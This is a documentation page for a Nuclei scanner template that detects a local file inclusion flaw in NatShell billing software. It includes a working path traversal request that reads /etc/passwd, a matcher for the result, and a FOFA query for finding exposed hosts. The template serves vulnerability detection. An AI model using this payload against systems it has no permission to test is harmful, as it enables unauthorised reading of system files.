NatShell - Local File Inclusion
ID: natshell-path-traversal
Severity: high
Author: pikpikcu
Tags: natshell,lfi
Description
Section titled “Description”NatShell is vulnerable to local file inclusion.
YAML Source
Section titled “YAML Source”id: natshell-path-traversal
info: name: NatShell - Local File Inclusion author: pikpikcu severity: high description: NatShell is vulnerable to local file inclusion. reference: - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 fofa-query: title="蓝海卓越计费管理系统" tags: natshell,lfi
http: - method: GET path: - "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "toor:[x*]:0:0"
- type: status status: - 200# digest: 4a0a0047304502202011218f11d0004335905d0eba842c4f8a99eb20edb01531ce620770b0d37297022100b5ecb917ccfae5fd81c3d7a70ce01a691908ac8c5309df171f14d1e354c21d04:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/natshell-path-traversal.yaml"